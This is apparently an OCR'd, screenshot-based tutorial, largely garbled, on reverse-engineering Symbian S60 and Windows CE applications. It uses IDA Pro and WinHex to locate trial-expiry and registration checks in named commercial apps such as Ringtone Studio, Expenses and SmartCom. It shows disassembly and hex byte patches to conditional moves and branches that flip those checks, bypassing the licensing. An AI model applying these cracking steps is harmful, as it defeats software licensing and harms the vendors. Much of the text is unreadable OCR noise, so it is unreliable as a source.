".... text: 1000C... 
".." text: 1000C... 


.text:1000C... 
"1 text: 1000C... 
1." text: 1000C... 
"1 text: 1000€... 


MOM A 


Res Count ; 262 


00000010 uni... 
DOD00010 uni... 
D0000006 uni... 
00000008 uni... 
ODODOD0E uni... 
00000008. uni... 
DO000008 uni... 
00000010 uni... 
DODOD00C uni... 


OOO “ns 


DO 
DO 
DO 


A ReadíChildlRes Hex Modifv Res Hex Fill Mode 
A 


ReadíChild|Res Text ModifyíChildlRes Text Modify Res Text Ounicode 


w [aáutosave [Y] ASCII Inc Smart Hint 


¡Res Index : -1 


8 ay ul ao lll 


Do 
DO 
Do 
DO 
Do 
Do 


String 


Muted [ 
Unknown 
e: 

mid 
midksg 
(td) 

2dMt 
Muted [ 
«michi 


did 


iS E ON 
Td Js XÚ 
dansa za ay 


¿OD Alaya ju ja A, 
GS pas Je 


L= 


3 
PINTA 


0 CT 36 UltraRscEditor : 


Four word 


AD OE ; 

cclos loo [oo joo loo |.1.[.1.1.1.1.1.1.1. 1.1.1.1. |. 

DO |00 AMM E MAA ANA 

6c 00 El 

bo Ton Lt ITITTTTT 
oo [oo jos [asj4r [.1.1.1.1.1.1.1.1.1.1.1.1.1. 


ha 


FF .]pl. ella 
oo loo [o+|as[so [.1.[.[.1.1.1.1.1.1.1.1.1.1. 
FF FF 
00 00 
FF FF .lal. sl 
0000/04 AB45  |...... al-1.]. 1.1.1.1. 


55 


Ej 
OSO SS $ 


00 ALI Tetela l 11 TT 


$ RODEO RARO 
Est La] 


A A A IAS [a 177 


Ono 

Orr 

(O) whitespace 
O Cross 


Code 


O ascII(n) 
Oascu 


[EjReplace 
(H)Hex Replace 
(CJClear Nul || (AReset | [S]Save File 


Child Res Index : -1 [Copy Loaction ; not set Code : Unicode. 


ld loe as aa Ives oagz: ATARE ió $ Sd id el lvl. 


“a . o E e 2 eE E . . 
¿go GA yo USO ¿0 que GadJY CUA E uz 20 des gaia ¿boya Mya ¿Lo lnvalid Code : 
16: 0740 A ReadíChild/Res Hex ModifyíChild/Res Hex Modify Res Hex 
E 17: 07DB -—143.006F 0064.00 65 00 20 00 43 00 6F 00 64 00 65 00 20 00 43 00 6F 00 64 00 65 00 20 00 
m0 18: 07F9 5, | 49.00 6E 00 76 00 61 00 6C 00 49 00 6E 00 76 00 61 00 6€ 00 49 00 6€ 00 76 00 61 00 6C 00 
3-19: 081D 69 00 64 00 69 00 64 00 69 00 64 00 
U(0JO: 0810 
=- 20: 0837 
TN ReadíChild|Res Text ModifvíChildRes Text Modify Res Text 
B5- 22: 087B Code Invalid Code Invalid Code Invalid 
+23: 0843 
5-24: 092D 
4-25: 0909 
26: 09E7 


a 4 le ay 
CE 


du du tuorcóus ez 19 desd 7 Accepted Code pue dui? Eos ue 


te «ES a Peck CUAD az) Eauód q al 
. ReadResourceAsDes veziQ 33 


A E 


Sa 


ere dorebó jc da 


LDR R2, =0xEADF 020 
BL ReadResourceAsDes_ CCCoeEnuRTDes16i 


E EN ES 


eróss. sq dp zoedio jya hy poa a js e 
” all E 4 


150 dG 
Séva je 


gsi 


ali oa 


CO 
Es 3aptis jedi dise Decimal ¿0024 ¿Q00)SEADFOO 


nos . .f ey e. E aga 
32: 5 eo alg do e EADFO2O 94 05 ¿a 


=- 21: 084F A | ReadíChild/Res Hex ModifpíChildlRes Hex Modify Res Hex Fill Mode 

54 00 72 00 69 00 61 00 6€ 00 54 00 72 00 69 00 61 00 6€ 00 54 00 72 00 69 00 61 00 6€ 00 Ono 
+-22: 087B 20 00 65 00 6€ 00 64 00 73 00 20 00 65 00 6É 00 64 00 73 00 20 00 65 00 6É 00 64 00 73 00 O FF 
+23: 0843 (20006900 6E 00 20 00 25 00 20 00 69 00 6€ 00 20 00 25 00 20 00 69 00 6E 00 20 00 25 00 10) Whitespace 

3 64 00 20 00 64 00 61 00 79 00 64 00 20 00 64 00 61 00 79 00 64 00 20 00 64 00 61 00 79 00 P 
+ 24: 092D 73.00 2£ 00 7300 2E 00 73.00 2E 00 Ocross 
1-25: 09C9 
Code 

+) 26: 09E7 ' .. : Olea 
4-27: 0413 ReadíChildlRes Text ModifyíChild/Res Text Modify Res Text Unicode 
+ 28: 062B Trial ends in Y%d days. [Trial ends in %d days. Trial ends in %d days. O ascii) 
+ 29: 0453 Oascu 
+ 30: 0478 
+-31: D49D (E 
+ 32 DAB3 (H)Hex Replace 


all Bu ls ud de Ado ¡pit (379) 


lug legs ama les ag: ATARE besa? loz sl lucido ct 


jamais sE ADFadl ya4 jo EE: Go 0 jar E | Q 
ido az Jo l Ly 


uz uaReadResourceAsDes 


Mo 3h gio ad ld je oo 
vcd do ll astral EADFO15. 


cuña du raoa te 


15 ¿eL jui lo 


:xEADFO150 E ó 3 9 Immediate Value Search Ge IDA-2¿ q) dis 
Search Immediate E 


This command searches for the specified 
value in the instruction operands 
and data items. 


Walue to search [Os EADFO1 5 


1] rw untyped value 


Find all occurrences 


4laL. lezlszt ¿Sal go: 


e po á . 
Ao AS CÁs) o Sdya A45) 0 Slya ¿ho) : 


atasca indias 


all Bu ls vall de Ado ¡gas (380) 


loba lo dz IES VASC: ATARE bis? luz ld edo t 


BL _ CAknConfirmationNote __ CAknErrorNote 
R4, RO, $0 R4, RO, $0 


RO, SP RO, SP 
R1, 40x28 R1, 10x28 
_ TBufBasei _ TBufBasei 
Good boy RO, R5, $0 R5, 10 erorr message 


sP 
=8xEADF 01 


ReadResourcefAsDes__CCCoeEnuRTDes16i 
RO, RA, 10 
R1, SP 
ExecuteLD__CAknResourceNoteDialogRCTDesc16 
SP, SP, 40x58 
(RA,R5> 
RO) 
RO 
5 End of function sub_180972A4 


[> 


O 


có E 


ais e Malabo: 


all Bu A val de Ado ¡pat 81) 


log lea omo les vago: ATARE bs? luz ld rlse dust 


Group nodes 


Jump to xref to operand.... 
Ro, sora | Chartofxrefsto 

, | 
newL_ CBaseU LA Chart of xrefs from 


ADDS R4, RO, $0 | £ Edit function... 
cHP R4, $0 . 
, Set Function type... 
BEQ loc_1 0007209 4% $ Ss diia 
E Text view 
¡X Undefine 


Synchronize with 


_ CAknConfirmationNote 
R4, RO, 40 


xrefs to sub_100072A4 


|] Jump in a new hex window 


N Rename N 
L Jump to operand Enter 
E Jump in a new window. Alt+Enter 


A [ra 
_ CAknErrorNote 
R4, RO, $0 


Dir... T. Address 
Milp p sub 10007188+F4 
L4D.. p  sub_10007748+C2 


Text 
BL 
BL 


sub 10007244 
sub_10007244 


(Dax) 


+ , , 
Trial Time 0027 


A TIN 


ñ qa 33 aeó ade Co do al q E coló 0] 


: 


galón; de 


: Protection 


loiag lee as ame lUESLASZ: ATARE bis az luzel wall. 


RO, 41 
RO, [R7,40x74] 
loc_1000781E 


loc_1000781E 


ADD SP, SP, 110x14 
POP (R3-R5> 

mOU R8, R3 

mHOU R9, Ra» 

HOU R10, R5 

POP (R4-R7> 

POP íRO> 

BX RO 


5 End of function sub 18007748 


cosida ga Edo eos lg Sw sus BL sub_100072A4 49 Goiás ZogS a 
La . 
ET AT A A EST 


. A 3 
400 


. " 2 Y A >s Me pe 


Py 0 je al ge o de dl dea ¿bss amos 
CAN sión es rotor 10007760 BEQ sebas sj a al gis 
¿el al goes edu di ss 359 a 


ya 
$ 


PLE AO O 


| Group nodes 


-0; 
-0: N Rename 


var_24= | és 
L Jump to operand Enter 
PUSH <¿R« [E] Jump in a new window. Alt+Enter 


MOU R7 
HOU RóÓ ERES 
HOU RS Jump to xref to operand. 


PIISH ¿RUE Chart of xrefs to 


[ES] Jump in a new hex window 


all Bu ls ud de Ado Ibpit (83) 


load log tas ie lies gc: ATARE bis az luzel wall. 


QUE 


Lun n+. [nuj 


MOU R8, R4 
R7, 140 
loc_100075D8 


R1, [R7,0x60] 
RO, R7, $0 RO, R7, $40 

RO, 110x609 RO, 1$0x60 sP 

R2, [R1,8] R2, [R1,8] 48 

R1, 10 R1, 41 [SP ,+t0x2C+vuar_1C] 
sub_10008FD8 sub_10008FD8 =30010078 
loc_10907606 loc_18907606 , RA, $0 

_ TPtrc16PCUs 

RA, R8 

R3, [R4,10xC] 

RO, R6, $0 

R1, R5, 10 

R2, [SP,40x2C+vuar_1C] 
sub_100808FDC 
loc_10907606 


PELS 


PUSH (R4-R7,LR> 
HOU R7, R8 
PUSH iR7> 

SUB SP, SP, 40x14 
ADDS R7, RO, 40 

BL sub_19009540 
STR RO, [R7,110x64] 
sub_10005F18 


RO, 10x74 

BL sub_10007078 
LDR RO, [R7,1t0x74] 
RO, $0 
1loc_10007574 


Important 


8 ay ul ao lll 


o edo: 


¿ogro ibója y ¿Time Trial: 


203 


100.00% 


adjoboisDE75 das Je 3 


00007546 /E061 1848 A064 1048 
D000756C|A16E 0029 O5DO 0868 
00007590 |201€ 2910 03FO 16 
000075B4|F4CF 0010 76CFA0D10 
000075D6|8DFD 786F 0028 
000075FC|396E 3810 6030 Más 


(291,291) — (176,338) 


0701 E 


bs? local 


o loc_10007574BEQ 920 33) 50d ¿bas 


/DOOO7SDE 10007562: sub_10007540+22 


. 


dañe y oz aly jade dd y 7e BEQjDO $4 DO 
EOUBNE Fapido ro: DA y 


E064 1848 2066 1848 2060 216F 0029 O5DO 0868 6268 0810 0321 D1F0 74FD 
9268 081€ 0321 D1F0 6BFD 616£ 0029 05DO 0868 8268 081€ 0321 D1FO 62FD 
3080 018€ 0047 0000 FODS 0010 74D9 0010 64D9 0010 24D9 0010 30D9 0010 
OBS 4746 B0B4 85B0 071 02F0 29F8 7866 FEF? DEFC B666 3810 7430 FFF? 
6E 361€ 6030 8A68 0021 O1F0 33FD 48E0 3810 7430 FFF? 94FF 0028 07D1 
121 01F0 25FD 3AEO 786E 02F0 A7F9 051C 2E68 6046 0D49 201€ 02F0 64FE 


age a all lO ll MidiEd. App «í 30 


He raro selea 


(] BestCalc 
CellPos 

(7 DigiaConnect 
[J irRemote 


— MA 
L FMHU E 


mobiolawebcam2 
(7 Mp3Player 


Select 


Cancel 


00001001 


gl HidiEd.App 63KH 


apps 
mn E 


favourites 
[mer | help 

(7 install 

libs 

( localizer 
Mail 


Options * 


MarkjUnmark 
Copy 


Copy Inbox 
Iinfrared On 


Cancel 


E ¡Sysi ¡emiap pS E ¡Sysi len ¡ap ps 
(] BestCalc (] BestCalc 
(] CellPos (] CellPos 


(7 DigiaConnect 
irRemote 


(7 DigiaConnect 
O irRemote 


File presentl 
Dverwrite? 


Cancel 


OK 


O O A O a he AS E e e ae de pe e 
SI o eds qui jj a gg 300 gd JU gas o ira: 


8 ay ul dao lll 


is logs acia loss urge: ATARE big? luz ld ATA 


Ringtone 
Studio 


(no data) 


s JU 
| 
2 Honky-Tonk |] 
A Electric Piano 1 
is option is 
only available in 


the tull version ot 
Ringtone Studio 


Send » 
Edit Track » 
Edit Song » 


; O . . ] od ed : 
al odas 9 32 asado 3L0 ya o qa 
A ya: 


A ReadíChildlRes Hex ModifvíChildlRes Hex Modify Res Hex 


54 00 68 0069 0073002000 4 |540068 00 69 00 73 00 20 00 54 0068 00690073002000 4 

6F 00 70 00 74 0069006F00 + |6F 007000 74 00 69 00 6F 00 6F 00 70 00 74 0069 006F00 

6E 00 20 0069 0073002000  —— |6E00 200069 00 73 00 20 00 6E 00 20 0069 0073002000 
— [6F 00 6£ 00 6€ 00 79 00 20 00 6F 00 6€ 00 6€ 00 79 00 20 00 6F 00 6€£ 00 6€ 00 79 00 20 00 


61 00 76 00 61 00 69 00 6€ 00 61 00 76 00 61 00 69 00 6€ 00 
61 00 62 00 6€ 00 65 00 20 00 61 00 62 00 6€ 00 65 00 20 00 


61 00 76 00 61 00 69 00 6€ 00 
61 00 62 00 6€ 00 65 00 20 00 


-E-E-0-0-0-0-4-E 


ReadíChildlRes Text ModifvíChildIRes Text Modify Res Text 
+52: 1020 This option is only available in This option is only available in This option is only available in 
the full version of Ringtone the full version of Ringtone the full version of Ringtone 
+53: 1043 ; : é 
Studio Studio Studio 
54: 1074 
+55: 108D 
+56: 1002 
+ 57- 10FN 


adó sad 45d ódblzóde 91194426 


all Bu ls ud de Ado ¡pit 


lag lee as ame lUESVASZ: ATARE bis az luzel SN LS 


Search Immediate 


This command searches for the specified 
value in the instruction operands 
and data items. 


Walue to search MMT Y | 


| LD] Any untyped value | 


| Find all occurrences 


AR as 
Gáñpa cgi: 


dd ea y geo ps 10 álJog as iy Oy olga yo 


a ay ll ao lll 


| «Text 100003 4A BL SUD_TUBUVARA 
.text:1000084E B loc_100089A3A 
Lext : 1000085 O y ———- TI oo 
.text:10009850 
.text:100900859 loc_10009850 ; CODE XR 
* Ltext:10090859 LDR RO, [R6,1t0x74] 
* .text:10090852 chP RO, $0 
2 .text:10000854 la BNE loc_19898860 
; * .text:19000856 LDR R1, =0xEADF 02D 
"2 .text:190900858 B loc_109888C6 
1 ext: 1OBBOBSY 5 ——-—-—- III 
¡ * text: 18000854 ALIGN +4 
; *  text:10000850 dword_18890850 DCD SXEADF 82D 5 DATA NR 
1 ext POBOBBÓD y —————— ooo 
! «text :1000086 9-+-——— 
'— ,text:1000908609 loc_10009860 ; CODE XR 
>" _text:10000860 ADD R7, SP, $0x14 
* .text:10000862 ADDS R2, R6, $0 
*  text:10000864 ADDS R2, 110x809 
*  text:100980866 ADDS RO, R7, $0 
*  text:10000868 ADDS R1, R6, $0 
* .text:1000086A BL sub_1000186€ 
* .text:1000086E LDR RO, [SP,0x14] 
* .text:190900879 LSLS RO, RO, $4 
* .text:19000872 chP RO, $0 
2 .text:10009874 BEQ loc_10009886 
; * ,text:100900876 LDR RO, [R6,0x7C] 
; * .text:100989878 ADDS R1, R7, $0 


A 


sis) fail iló cia 


liga legs o LES AG: ATARE bis? luz ld ie dOt 


culyájobe, ¿ió 4 onooo8DO 


10000854; ,text:10000854 


¿DO 9D1-¿ 00, $40, BEQ 9 BNE-¿Ó* y 


000008B8|00D1 FCED 301€ DAFO ODF9 F8E0 301€ O0FO 2BF9 F4E0 706F 0028 

000008DC |05AF 3210 8032 3810 3110 OO0FO FFFB 0598 0001 0028 07DO FO6F 38 

00000900|1FFA 8724 A400 6044 9594 0549 201€ DAFO S5BFE 9598 DAFO SEFE BFAA 6 
¿OVabal gio alla ld E 3 ¿ueso aia eg da jóné : 93d le su 


¿UD Y Cobo yal $2 so u all e E, Less Jvxkíl e á 


Enter Name: 
Edit Track Y abs 


Eultsona 
Select 


CancellOK Cancel 


y JE Atáre ad ¿e e OK dea YY als ¿¿isbayajo qe Memory Phone : ¿div 
5 Digital sounds 
> 


LEI AA 


a ay ll ao lll 


lie legs diz Ives ago: ATARE bis Dd Es 1 ale duest 


¿la jibrilos ll) A 


$00 Reversino (2) 


System Operating Symbian 329502300842 JARM 59 4 ¿og óleo 


s s . á 4 . E E , da es 
7 Z GA 004 SNS lo ¿yá d Do cia cues as ula a Xéya ¿ya añ ee sá 
id J 


A A E A ERES 


lada ó¿óna a: IDA 5.2.0.908 O) 
SisWare : ed luso aya S yn DÚustva Js al sis (0) 


rd so dudo, O | “3 
a o O IN e y 


WinHex 


Petran: lo Ps opt 


AN A ¿+ A 
oa Opcodes 2 t3aya da y 


Ego óa O 
GE 


11,30 X-plore : ¿eo Msahua ésto qee Eó 


expenses-s60-3-v-2-0.sis O / Y 
smartcom_s60_3rd_trail.sis O / 


eN Lis Al yO ssl Js CATS eLo! EGÓ: Suite PC Nokia 


all Bu ls vall de Ado ¡gas (89) 


lg log aa loe gc: ATARE bis Dd Es 1 lod e 


Za ge a Icódo al Lal 


E EN ha les ¿pls adi o FO A ¿aaa 0% A 0 DAMA Certificate sue di E do pao 
a pe at su ¿ya Private 8 di lalJe cado MS As se 90 93 taa E: pa CA di Aga 3 S60 «< 


anos e 


e es Pao ls 
Y y at Uy de de du 


Mas Jlbya Peg ci q EA nl quad ya to 2 Pl A 220) ¿a E po 
Ugo «ju ¿dias ¿pS po ja 9 500 Es dl TUS sa do v1.1 Manager Security BINPDA 
3 


aa A , Pd 5 did La: 
Wo dbásóy Jl air ae A md ES 3 ¡[CET OS 


y fatal sis JE asis Ware ju lo jaa Petran 
Pro AGNERES v5.2 IDA E Ed: e Ll du 


0000 


jaredio jyas oa N73 Nokia 107 S¿naa, 


Al sui ya 


all Bu A ql de Ado E (390) 


las leg as dz Ives sz: ATARE bé $ Dd Wd el lvl t 


.Expenses v2.0: mig e 
SymbianGuru: — 323%; (DD 


www.symbianguru.com : dl 


Trial version 
This is a 10 days trial 
version 


A dee be . no. 
2 0 O E 


1 disaye Options - ¿Register $07 Oy 


¡ee gsallys epiajóva 


dejados Imports ¿e egÍ 
aisla?! TDesCCompareERKS 


A A ES A ER 


ta ES a 
NS AURA 


: Symbian OS 9.1 Developer gus ej 20d diga ¿óra 


class TDesC8; 
Members: 
Compare) 
Prototype : 
IMPORT_C Tint Compare(const TDesC8 8:aDes) const; 
Parameters 


The 8-bit non-modifable descriptor whose data is to be compared with this 


const TDesC8 8:aDes descriptor's data, 
Es Ios la Specified Descriptor's Data bitnon-modifiable Descriptor's Data-8 ¿0 2% Ip) 


a td 8 año ll pat 


las leg as yz Ives sz: ATARE 07 $ Dd Td el lvl 


T 

| ligas 
| E 

| 

| 


Return value | 

Positive, if this descriptor is greater than the specified descriptor. Negative, if this 
descriptor is less than the specified descriptor. Zero, if both descriptors have the same 
length and their contents are the same. 


Tint 


Return 


( 
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)Valuezió)Register( 


Ely VU 3Z3U l6ZI TUESLANOCLLE Y_U euser 

[Ey 00049204 — 1728 TDesCállocLEw euser 

[Ey 000490... 1817 TDesCállocLEw_0 euser 

[Ey 00049268 — 1718 TDesCártCEi euser 

Era 000491... 1806 TDesCAtCE¡_0 euser 

300049174 1733 TDesCCompareERKS een 
00049218 1822 TDesCCompareERKS_0 euser 

ER 00049258 — 1818 TDesCLocateETChar euser 

E 00089150 1820 TDesCMatchFERKS euser 

[EEN 0004.92... 2108 TDesCMidEi euser 


nte z 
7 AQUA 


sub ar 
Lana 53 


Cb o 


3 


gg Pe dl) dé 


Sy a ¿nódaje 14 ¿bo0 load 


4 ¿ote ovabes y 
rusa Je Eds: MOVEQ8, MOWNE dl 
y ie ds aras dai ed oda: 


.idata: 00949170 2? 2? 2? 2? IMPORT _ imp _RArrayBaselInsertIsqEPKuPFiSSEi 

.idata: 00049178 ; CODE XREF: RArrayBaseInsertIsqEPKuPFiSSEiTj 
.idata: 00049170 5 DATA XREF: .text:0ff_2DCC4To 

.idata: 0009174 2? 2? ?? ?? IMPORT imp TDesCCompareERKS  ; CODE XREF: TDesCCompareERKSTj 

.idata: 0099174 5 DATA XREF: .text:off_2DCF4To 

.idata: 00049178 ?? 2? ?? ?? IMPORT __imp_RArrayBaseBinarySearchEPKuRiPFiSSE 


LON, pd E MESÍA" imp TDesCCompareERKS — “alcoi 


Lu xrefs to __imp_TDesCCompareERKS a] (a) E 


Dir... T | Address Text 
alUp_j_.TDesCCompareERKS _LDR_ PC.=_imp_TDesCCompareERIKS: off_2D0F4 
ldUp o .textoff_2DCF4 DCD _imp_TDesCCompareERKS 


A 
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lid leas aioz IES Uagz: ATARE Li sat luzs 1] lvl. t 


.text:0002DCF0 
.text:0002DCF0 5 Attributes: thunk 
.text:0002DCF9 


.text :0002DCF9 TDesCChmpareERKS 5 CODE XREF: sub_12848+DC1p 
.text:8002DCF0 ; sub_12848+12C1p ... 
.text:0002DCFO 009 04 FO 1F ES LDR PC, =_ imp TDesCCompareERKS ; Indirect Jump 
.text:0002DCF8 000 ; End of function TDescCompareERKS 

.text:8002DCF0 


E css E sp A 
ceedascogámij: X"""  TDesCCompareERKS 2» illo la 


> 
Ca 


de ¿References ge ok ee lU só E Veas 5 E GEO gaia ¿oO ¡A 


Lil xrefs to TDesCCompareERKS ls (a) EJ 


Dir... T. Address Text 

ldUp p sub 12848+DC BL. TDesCCompareERKS ¿TDesCCompareERKS 

ld Up p sub 12848+1 SS BL. TDesCCompareERKS ¿TDesCCompareERKS 

wi O DestCompareERKS ARRE ME 5 


ldUp p sub 25E80+88 BL — TDesCCompareERKS ¿TDesCCompareERKS 


: MOVNE 8: MOVEQ 003% eos 


BO 28 00 EB BL TDesCCompareERKS 
54 80 0B ES STR RO, [R11,Htvar_54] 
54 30 1B E5 LDR R3, [R11,Htvar_54] 
00 00 53 E3 chP R3, $0 
99 38 AB 13 MOUNE — R3, +0 
01 30 AB 83 MOVEQ  R3, $1 


4 , 
tos.b Me 
00 iaa ol 


: me SS iS Ye EN E 0 re 


b 


gas QU Pl Mago ES lesa SellE o 
E ere ES 


1gÓgO 3) il 


1R3, MOV Es us 
á MOVEQ R3, 41 2 exa tua quaió do dnse yjamas 028 bd us. ón Seal 


El 
: MOV R3, +1 


1BAD8 0130 AO E3 01 30 AO 03 
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BO 28 EB BL TDesCCompareERKS 
54 0B ES STR RO, [R11,Htvuar_54] 
54 30 1B ES LDR R3, [R11,Htvar_54] 
90 89 53 E3 cHP R3, $0 
90 30 AB 13 MOUNE — R3, $0 
01 30 AB E3 mou R3, 41 
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A 
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al ¿Sa yA : 


Expenses (¿22 Expenses (20 5 


Y 


(no data) (no data) 


Enter registration code: 
Registration 


successful! 
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UN ar js o ¿lo dz e JU ja ela, 


cAprivatelA0002844 2£ E séis License.dat ás cia ico duela VÍ geó : yal + 


Smart Com v1.00: se 


.Aims MIGITAL Technovations : 3 sh, 2) 
Ñ AS 


.www.migital.com : de 


£ E e Y E 
aya 7 E SEGA 30 ¿ AS 90. 
Gsacas q expired is Trial 


IS 


roja ao odie 


jo: SÍ cl as Us azo Trial Continue 33*2 par ábogizoscioduoyeExpiredTrial 


all Bu ls vall de Ado ¡pat ES) 


bs? local 


Smarttom MS 


Buy 


Buy Via Wap 


Get Activation Key 


Use Scratch Card 


Create License 


Using Activation Key 


¿Leo salga da are istrings 4 JO IDA de Ja poi ya ¿a jo 
¡gócicó 220 3Trial Expired 


text: 00080... 00000032  unicode Registration Successful. 
text: 00080... DODODO3E —unicode Invalid Key! Please try again. 
.text:00080... DOO0001C.- unicode Licensed User 

.text:00080... 00000018  unicode Continue... 

.text:00080... 00000010 unicode JMSALES 


0000001E unicode 


00000010 


Continue Trial 


text: 00080... 


“text:0080... urleada Buy Ho 


text: 00080... 00000016 unicode Days Left 
«text: 00080... 00000010 unicode DAEESAEES 
text 00080... 00000008  unicode Buy 
text 00080... 00000018  unicode Buy Via Wap 
JUózo Licensed User y La Eon 0 dao UV ¿yiós Gua As cias Ju ja 
«rá ja Y olas 2 User Licensed Continue Trial 93 Trial Expired 
- LECAL-.VUUVOUI7T7ZL UY UY UVULY yu 
.text:00080594 49 00 6É 00+ alnvalidkKeyPlea unicode 6, <Invalid Key? Please tr 
.text:00080594 76 00 61 00+ 5 DATA XRE 
.text:000805D2 60 008 DCU 6 
.text:000895D4 4C 00 69 08+ alicensedUser  unicode 0, <Licensed User>,0 
.text:000805D4 63 00 65 00+ 5 DATA XRE 
.text:000805D4 6É 00 73 00+ 5 .text:of 
.text:000805F0 43 00 6F 00+ aContinue_ unicode 6, <Continue...>,0 
.text:000805F0 6É 00 74 00+ 5 DATA XRE 
pobla: eo els nx YÍ cts val 
ads aLicensedUser 


o 
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«LEAL. VUUO YUU 


.text: 
.text: 
text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 


000300D4 
800300D8 
000300D8 
0003008DC 
000308DC 
000300E0 
00030050 
00030054 
00030054 
000300E8 
0003 00E8 


.text:0002FB78 
.text:0002FB7C 
.text:0002FB80 
.text:0002FB84 
.text:0002FB88 
.text:0002FB8C 
.text:0002FB90 
.text:0002FB94 
.text :0002FB98 
.text :0092FB9C 
.text:0002FBA0 
.text:0002FBA4 
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> 33 aContinuetrial + ¿0goBNE:BranchifNotEqual:3% 


D4 85 


FO 685 


08 06 


18 06 


38 06 


27016 


A TIN 


ye je 


(575) off_300D8 DCD aLicensedUser 
(515) off_380DC DCD aContinue___ 
1515] off_380E0 DCD off_80608 

80 Off_380E4 DCD aContinueTrial 
B0 off_300E8 DCD aTrialExpired 


My gn sal ¿año s off_300 D8 


> 


QUe 


R3, [R11,ttvar_20] 


R3, 41 


loc_2FC24 3 *x** This is the magic branch * 
RO, R11, 110x94 

TDeseroEu 

RO, R11, 110x104 

TDeseroEu 

RO, R11, 40x174 

TDeseroEu 

RO, R11, H$0x17C 

R1, =aLicensedUser ; *xx* will be intercomputernet 
TPtrC16CEPKt 


nas na “sn 


Gibeto alicensedUser 


gama )0daTrialExpired 


17d alicensedUser «¿pz gy o 
¿iia ye y ras alba zado: 


00 00 AO El 2700 00 1A 


bs? local 


More Downloads 


Other Migital Spplications 
Share With Friend 
via Sms 


About 


About Company e: Prod... 


ON 
Nag ás Mya due Expiredis Trial 
lá sTrialis Expired was 70, ÁAS Strings yc Screen ¿Ag Olas y ad gira y JO se7ÓsIDA 


Eos Brun O E O IN 
y O ¿Log ya cua Magia EN JO 33 LE 3 A : 


* _text:0890F368 280 51 0F 4B E2 SUB RO, R11, H0x144 

* text: B099F36C 280 AC 13 9F ES LDÍR R1, =aTrialIsExpired 

* .text:0999F370 280 33 8D 00 EB BL TPtrC16CEPKt ; J3 Lal see 

* _text:09900F374 280 51 3F 4B E2 SUB R3, R11, H0x144 

* _text:0000F378 280 90 01 1B ES LDR RO, [R11,Hvar_190] 

* _text:0890F370 280 01 19 AD E3 HOU R1, $1 

* _text:0090F389 280 03 20 AB El HOU R2, R3 

* .text:09990F384 280 72 8E 00 EB BL CONE_11 ; ¿ll srl e 
* _text:08900F388 280 9C 31 1B ES LDR R3, [R11,Htuar_190 


Ed ú ES Capo vas ho ¿ña abs, Ya: 


740C 0000 AO El 33 8D 00EB 
7420 0000 A0E1 72 8E 00 EB 
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A TIN 


lg log a aa loe gc: ATARE bis Sd Es 1 loe duz 
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E 


http://en.wikipedia.org/wiki/ARM_architecture 


http://www.arm.com/ 
http://en.wikipedia.org/wiki/Symbian 


http: //www.forum.nokia.com/info/sw.nokia.com/id/2c835bc6-4106-__4563-9eb07f215b27e 83c/S60 3rd Edition Cpp Developers Library.html 


http://developer.symbian.com 


http://www.newlc.com 
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WingonsMobrleciánia jus 


WINCE Reversins 


.ARM7-TDMI-manual-pt2 o) 
.arm_edit_Disassembler O 

DuckHunt Y 

Fun2Link O 

-Handmark Yathzee 1.05 Y 
Wince O 
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Wo li ás 


A INS 


ADC » pias 
ADD 

AND And 

B EE 

CMP ya 
EOR EOR 
MOV MOV 
MUL MUL 


lug legs ama les ago: ATARE besa? loz sl lucido ct 


cult: 
Hex LUjaz 
0000 EQ Z=1 
0001 NE Z=0 
1010 GE N=V 
1011 LT N!=V 
1100 GT Z=0 8 N=V ES 
1101 LE Z=1 || Ni=V 306 stos 
1110 AL 0726 SEqaó 


qós yd ¿dir aa ¿op cajas qUe 
L* ¿Caja B Le ¿ños pa yá ur ya E 1% en ¿oye qudó: 10) 
BEQ Xd hy dos 
BNE Ah dos 


BLT AS 


E ts a ee PEI a 
: MOV ¿tigo 


Mov = XX XX AO EX 


Yodo, de 
43h jo 5d 
Bo “$ 
X=1 ru Sópya ALO y 


NB ¿Oya alli 4 
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MOV R3,R2 02 03 AO E1 
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MOV R2,+5 
MOV RO,R4 
MOV R5,+tFF 


X 


CMP R2,R3 
CMP R4,+H1 
CMP RO,R4 
CMP R5,H FF 


BRANCH = XX XX XX EA 

BEQ:; I£Z = 1 (XX XX XX 0A) 
BNE: IF Z=0 (XX XX XX 1A) 
BMI: IN = 1 (0 XX 4A) 


CMP RO, R1 


N=1 Z=1 
RO >= R1 RO=R1 
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FF 05 AO E3 
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03 00 52 El 
01 00 54 E3 
04 00 50 El 
FF 00 55 E3 


C=1 
RO>=R1 


: CMP Lia 


CMP = XX 00 5X EX 
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File Edit View Tools Window Community Help 


El - Sa at) - AR ARAO 


x Start Page 


Microsoft" 


Visual Studio 2005 


Recent Projects Visual Studio Developer News 


The current news channel might not be valid or your Internet 
connection might be unavailable. To change the news channel, on the 
Tools menu click Options, then expand Environment and click 

Startup. 


Open: Project... [Web Site... 
Create: Project... [Web Site... 
a 


Getting Started 


What's new in Ct 20057 
Create Your First Application 
Use a Starter Kit 
HowDolI..,? 

Learn Visual Cit 

Conmect with the Community 
Download Additional Content 


Visual Studio Headlines 


Thank you for using Visual Studio 


Ready 


: Tools - > Device Emulator manager q * ón 
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Device Emulator Manager 


File Actions Help 


Available Emulators: Refresh 


¡SPDatastore 
Windows CE 5.0 

[Pocket PC 2003 
Pocket PC 2003 SE Emulator 
Pocket PC 2003 SE YGA Emulator 
Pocket PC 2003 SE Square Emulator 
Pocket PC 2003 SE Square YGA Emulator 

[2 Smartphone 2003 
Smartphone 2003 SE Emulator 
Smartphone 2003 SE QYGA Emulator 

Others 


so 32003 Pe Pocket 639 ¿Y ja alla ¿a Emulator SE 
: Connect Se 52 5 Pocket Pc 2003 


Device Emulator Manager 


File Actions Help 


Available Emulators: Refresh 


[Start O Y] 4é 4:22 Windows CE 5.0 
Y Wednesday, July 09, 2008 E Pocket PC 2003 
'ocket PC 2003 SE Emulator 
Pocket PC 2003 SE VGA Emulator 
Pocket PC 2003 SE Square Emulator 
Pocket PC 2003 SE Square YGA Emulator 
=)- Smartphone 2003 
Smartphone 2003 SE Emulator 
Smartphone 2003 SE QYGA Emulator 
Others 


rmation 


appointments 


Ego 


4.5 ActiveSync Microsoft 4 
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: Cradle Ge 52 Cu Pocket Pc2003 SE EEES 
Emulator 


Device Emulator Manager 


File Actions Help 


Available Emulators: Refresh 


Windows CE 5.0 

=- Pocket PC 2003 
==Pocket PC 2003 SE Emulator 
Pocket PC 2003 SE YGA Emulator 
Pocket PC 2003 SE Square Emulator 
Pocket PC 2003 SE Square YGA Emulator 

=- Smartphone 2003 
Smartphone 2003 SE Emulator 
